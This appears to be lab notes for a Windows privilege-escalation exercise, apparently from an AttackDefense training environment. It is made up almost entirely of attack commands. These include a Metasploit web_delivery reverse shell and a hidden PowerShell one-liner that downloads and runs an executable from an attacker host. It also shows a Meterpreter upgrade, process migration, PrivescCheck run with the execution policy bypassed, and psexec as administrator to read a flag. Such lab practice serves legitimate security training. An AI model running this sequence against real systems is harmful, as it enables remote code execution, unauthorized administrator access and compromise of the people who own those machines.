🔬Windows Privilege Escalation

nmap -sV 10.2.29.53
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds?

service postgresql start && msfconsole -q

setg RHOSTS 10.2.29.53
setg RHOST 10.2.29.53

search web_delivery
use exploit/multi/script/web_delivery
info
# Description:
#   This module quickly fires up a web server that serves a payload. The 
#   provided command which will allow for a payload to download and 
#   execute.
set target PSH\ (Binary)
set payload windows/shell/reverse_tcp
set PSH-EncodedCommand false
set LHOST eth1
exploit

powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$z="echo ($env:temp+'\P4MPrq7y.exe')"; (new-object System.Net.WebClient).DownloadFile('http://10.10.24.2:8080/y3MMtnMlRkQ81pA', $z); invoke-item $z

sessions 1
whoami
# Unprivileged user "student"

# Upgrade to a Meterpreter session
background
search shell_to
use post/multi/manage/shell_to_meterpreter
set LHOST eth1
set SESSION 1
show advanced
set WIN_TRANSFER VBS
options
# check the LPORT is not in conflict with the Session 1
run
sessions 2

ps
migrate 5048
get privs
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege

cd C:\\Users\\student\\Desktop\\PrivescCheck
shell
dir

# Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

# Extended Mode + Export Txt Report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"

exit
meterpreter > download PrivescCheck_ATTACKDEFENSE.txt

root@attackdefense:~# featherpad PrivescCheck_ATTACKDEFENSE.txt

psexec.py administrator@10.2.29.53 cmd.exe

cd C:\Users\Administrator\Desktop
dir
type flag.txt